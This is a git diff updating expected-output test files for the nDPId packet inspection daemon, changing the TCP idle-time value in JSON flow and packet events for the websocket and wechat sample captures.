-00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} -00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7440000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1475155931028,"pkt":"AFBWwAAIAAwpij2nCABFAABB27JAAEAGhyvAqCuHwKgrATA5xzc8ilRnydSxV1AYAO1IlQAAgRdXZWxjb21lLCAxOTIuMTY4LjQzLjEgIQ=="} +00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1475155931028,"flow_last_seen":1475155931028,"flow_idle_time":7560000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":1,"thread_ts_msec":1475155931028,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1475155946892,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1475155946892,"pkt":"AAwpij2nAFBWwAAICABFAAA6BcdAAEAGXR7AqCsBwKgrh8c3MDnJ1LFXPIpUgFAYP+\/mwAAAgYzhfo65lRv9zcET68qSH+nc"} +00525{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1475155946903,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":72,"thread_ts_msec":1475155946903,"pkt":"AFBWwAAIAAwpij2nCABFAABc27NAAEAGhw\/AqCuHwKgrATA5xzc8ilSAydSxaVAYAO0tVgAAgTIyMTozMzo1MiAoJzE5Mi4xNjguNDMuMScsIDUwOTk5KSBzYXk6IHRlc3QgbWVzc2FnZQ=="} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1475155931028,"flow_last_seen":1475156008657,"flow_idle_time":7560000,"flow_min_l4_payload_len":18,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":34,"midstream":1,"thread_ts_msec":1475156008657,"l3_proto":"ip4","src_ip":"192.168.43.135","dst_ip":"192.168.43.1","src_port":12345,"dst_port":50999,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"WebSocket","breed":"Acceptable","category":"Web"}} 00550{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":5,"source":"websocket.pcap","alias":"nDPId-test","packets-captured":5,"packets-processed":5,"total-skipped-flows":0,"total-l4-data-len":171,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":9,"global_ts_msec":1475156008657} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 5/5 diff --git a/test/results/wechat.pcap.out b/test/results/wechat.pcap.out index 76c70b1ec..c1c929a42 100644 --- a/test/results/wechat.pcap.out +++ b/test/results/wechat.pcap.out @@ -1,8 +1,8 @@ 00457{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"wechat.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00543{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1492167337792} -00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167337792,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"flow_min_l4_payload_len":604,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":604,"midstream":1,"thread_ts_msec":1492167337792,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -01281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":670,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":670,"pkt_l4_len":636,"thread_ts_msec":1492167337792,"pkt":"eJKcD6iO8IQvSpdgCABFoAKQLFpAACwG+e7LzZeiwKgBZwG700RsJQvmFiW5B4AYAQBhCAAAAQEICkXRlQMAMKrIjxNPGb1b2gIOFmmrodrIUGWpRD8pBe\/eyANOuHxnf1oEiCDKQxkU6yvgqiltC85O1YOlf4+boaZn\/v7U0TkR+lQ9a8XEdMtbUDNvRkN1lpLANNJe9T6WEXQRZhhQATyvHXIsPxznFQlv1ayF4fN0Lp1Tv+DnMtPovG4l64Fdnf94BKNh3wpUis\/1aaAJUl4N4QYAa2BN+MLHUIjBfzQomk58kbDVZlQvabo4eeiFrJQbG0CRtmIDLIV4UlMABwm2B+L0SD\/lX+vPdRjlbT0hOePKWkrPVp4oa0GnGMtovp\/3dKKj2adHC1yCvZqzc+T4heafDFJJDxNGnnTZtJeXWQW2\/Wn0xAXZa5xeVmiob7mVi7gQwqB4EyVdzoi+MdLqv1I0FdZ7WKuu9o+r6i7T5KxQ7NhUIRC9KEInuscbFfTp5tcTpkg81VRtJhveR07GYTrLSFchnUCEzbFpCOPEOlfHshGkgemcZqUW0JSeBZoVIhGHuP8IElk+zTdckKSFR7XZosRv+JZpXULghhsYEQIcWSnXEwiNwHqD7SkijDTYTSRARplFy3lQ+I9PYai9e3wxDdj38dt3ZjnYHW+Jgcvyxa81TfaFhCzMBo8JWYVcQLLQCzJJ7po8hcjxwSKSvs1BzLjoAmGIOQCY3cD2niwBo4mLwkfrwM7iYYbbTgCByxdl2XUzXKGTmMiV+yqiF1sadTUF0KDk8zQPlxqASeejWTULCaKDKO7zq0WMvrWWgtPS5+WycvqXy24tfwXRN6su4lzlC8cmzA\/wzbACdxOu6m0puRk6CDMzrA=="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} +00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167337792,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"flow_min_l4_payload_len":604,"flow_max_l4_payload_len":604,"flow_tot_l4_payload_len":604,"flow_avg_l4_payload_len":604,"midstream":1,"thread_ts_msec":1492167337792,"l3_proto":"ip4","src_ip":"203.205.151.162","dst_ip":"192.168.1.103","src_port":443,"dst_port":54084,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +01281{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":670,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":670,"pkt_l4_len":636,"thread_ts_msec":1492167337792,"pkt":"eJKcD6iO8IQvSpdgCABFoAKQLFpAACwG+e7LzZeiwKgBZwG700RsJQvmFiW5B4AYAQBhCAAAAQEICkXRlQMAMKrIjxNPGb1b2gIOFmmrodrIUGWpRD8pBe\/eyANOuHxnf1oEiCDKQxkU6yvgqiltC85O1YOlf4+boaZn\/v7U0TkR+lQ9a8XEdMtbUDNvRkN1lpLANNJe9T6WEXQRZhhQATyvHXIsPxznFQlv1ayF4fN0Lp1Tv+DnMtPovG4l64Fdnf94BKNh3wpUis\/1aaAJUl4N4QYAa2BN+MLHUIjBfzQomk58kbDVZlQvabo4eeiFrJQbG0CRtmIDLIV4UlMABwm2B+L0SD\/lX+vPdRjlbT0hOePKWkrPVp4oa0GnGMtovp\/3dKKj2adHC1yCvZqzc+T4heafDFJJDxNGnnTZtJeXWQW2\/Wn0xAXZa5xeVmiob7mVi7gQwqB4EyVdzoi+MdLqv1I0FdZ7WKuu9o+r6i7T5KxQ7NhUIRC9KEInuscbFfTp5tcTpkg81VRtJhveR07GYTrLSFchnUCEzbFpCOPEOlfHshGkgemcZqUW0JSeBZoVIhGHuP8IElk+zTdckKSFR7XZosRv+JZpXULghhsYEQIcWSnXEwiNwHqD7SkijDTYTSRARplFy3lQ+I9PYai9e3wxDdj38dt3ZjnYHW+Jgcvyxa81TfaFhCzMBo8JWYVcQLLQCzJJ7po8hcjxwSKSvs1BzLjoAmGIOQCY3cD2niwBo4mLwkfrwM7iYYbbTgCByxdl2XUzXKGTmMiV+yqiF1sadTUF0KDk8zQPlxqASeejWTULCaKDKO7zq0WMvrWWgtPS5+WycvqXy24tfwXRN6su4lzlC8cmzA\/wzbACdxOu6m0puRk6CDMzrA=="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1492167337792,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167337792,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0B7NAAEAGDZLAqAFny82XotNEAbsWJbkHbCUOQoAQAk6qQAAAAQEICgAwqxZF0ZUD"} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1492167338426,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1492167338426,"pkt":"AQBeAAD7eJKcD6iOCABFAABEuMlAAAERHdXAqAFn4AAA+xTpFOkAMOiYAAAAAAABAAAAAAAAC19nb29nbGVjYXN0BF90Y3AFbG9jYWwAAAwAAQ=="} 00679{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":3,"source":"wechat.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167338426,"flow_last_seen":1492167338426,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1492167338426,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"224.0.0.251","src_port":5353,"dst_port":5353,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"MDNS","breed":"Acceptable","category":"Network"},"mdns": {"answer":"_googlecast._tcp.local"}} @@ -18,20 +18,20 @@ 00789{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342857,"flow_last_seen":1492167342857,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":52,"flow_tot_l4_payload_len":52,"flow_avg_l4_payload_len":52,"midstream":0,"thread_ts_msec":1492167342857,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1492167342893,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1492167342893,"pkt":"eJKcD6iO8IQvSpdgCABFoAECAABAAEARtJXAqAH+wKgBZwA10eYA7qtlPBmBgAABAAIABAAEDHNhZmVicm93c2luZxFnb29nbGV1c2VyY29udGVudANjb20AAAEAAcAMAAUAAQAANssADgJzYgFsBmdvb2dsZcArwEAAAQABAAAAxwAErNkWDsBDAAIAAQAACYwABgNuczHARcBDAAIAAQAACYwABgNuczTARcBDAAIAAQAACYwABgNuczLARcBDAAIAAQAACYwABgNuczPARcBqAAEAAQABNLQABNjvIArAjgABAAEAATS0AATY7yIKwKAAAQABAAE0tAAE2O8kCsB8AAEAAQABNLQABNjvJgo="} 00807{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":12,"source":"wechat.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1492167342857,"flow_last_seen":1492167342893,"flow_idle_time":180000,"flow_min_l4_payload_len":52,"flow_max_l4_payload_len":230,"flow_tot_l4_payload_len":282,"flow_avg_l4_payload_len":141,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"192.168.1.254","src_port":53734,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"Web"},"dns": {"query":"safebrowsing.googleusercontent.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.22.14"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167342893,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1492167342893,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1492167342893,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342893,"pkt":"8IQvSpdgeJKcD6iOCABFAAA8j4ZAAEAGJj\/AqAFnrNkWDpcBAbvnsj+XAAAAAKACchDgsAAAAgQFtAQCCAoAMLARAAAAAAEDAwc="} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1492167342941,"pkt":"eJKcD6iO8IQvSpdgCABFoAA8xIIAADIGPqOs2RYOwKgBZwG7lwHnJuhS57I\/mKASpajHRwAAAgQFZAQCCApd2bi8ADCwEQEDAwc="} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1492167342941,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167342941,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0j4dAAEAGJkbAqAFnrNkWDpcBAbvnsj+Y5yboU4AQAOWaewAAAQEICgAwsB1d2bi8"} -00865{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":16,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1492167342893,"flow_last_seen":1492167342942,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":222,"flow_tot_l4_payload_len":222,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1492167342942,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00930{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":18,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1492167342893,"flow_last_seen":1492167342995,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1492167342995,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1"}} -02015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"wechat.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1492167342893,"flow_last_seen":1492167342997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":4434,"flow_avg_l4_payload_len":443,"midstream":0,"thread_ts_msec":1492167342997,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.22.14","src_port":38657,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"safebrowsing.googleusercontent.com","server_names":"*.googleusercontent.com,*.apps.googleusercontent.com,*.appspot.com.storage.googleapis.com,*.blogspot.com,*.bp.blogspot.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.doubleclickusercontent.com,*.ggpht.com,*.googledrive.com,*.googlesyndication.com,*.googleweblight.com,*.safenup.googleusercontent.com,*.sandbox.googleusercontent.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.googleapis.com,*.storage.select.googleapis.com,blogspot.com,bp.blogspot.com,commondatastorage.googleapis.com,doubleclickusercontent.com,ggpht.com,googledrive.com,googleusercontent.com,googleweblight.com,static.panoramio.com.storage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"d655f7cd00e93ea8969c3c6e06f0156f","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Google Inc, CN=Google Internet Authority G2","subjectDN":"C=US, ST=California, L=Mountain View, O=Google Inc, CN=*.googleusercontent.com","alpn":"h2,http\/1.1","fingerprint":"8B:36:AF:31:A2:4C:EE:50:CC:6F:34:F7:2C:A3:C5:B6:4B:02:AC:53"}} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"216.58.205.78","src_port":47627,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0u5hAAEAGF5PAqAFn2DrNTroLAbv4cm+uICz91YAQATUbzAAAAQEICgAwswD2qQZf"} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1492167345896,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1492167345896,"l3_proto":"ip4","src_ip":"192.168.1.103","dst_ip":"172.217.23.78","src_port":53220,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":42,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1492167345896,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345896,"pkt":"8IQvSpdgeJKcD6iOCABFAAA0ew1AAEAGOYDAqAFnrNkXTs\/kAbv7Pa3ZiiWYPIAQAT3Z6QAAAQEICgAwswB+x0ZO"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wechat.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1492167345935,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345935,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0XCMAADcGv2jYOs1OwKgBZwG7ugsgLP3V+HJvr4AQAV1HoAAAAQEICvaptmIAL9cA"} -00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"wechat.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1492167345937,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167345937,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0vmsAADcGPoKs2RdOwKgBZwG7z+SKJZg8+z2t2oAQAVQFzwAAAQEICn7H9k8AL9cC"} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":45,"source":"wechat.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1492167347435,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1492167347435,"pkt":"eJKcD6iO8IQvSpdgCABFoAA0LFtAACwG\/EnLzZeiwKgBZwG700RsJQ5CFiW5B4ARAQCiIgAAAQEICkXRnm4AMKsW"} 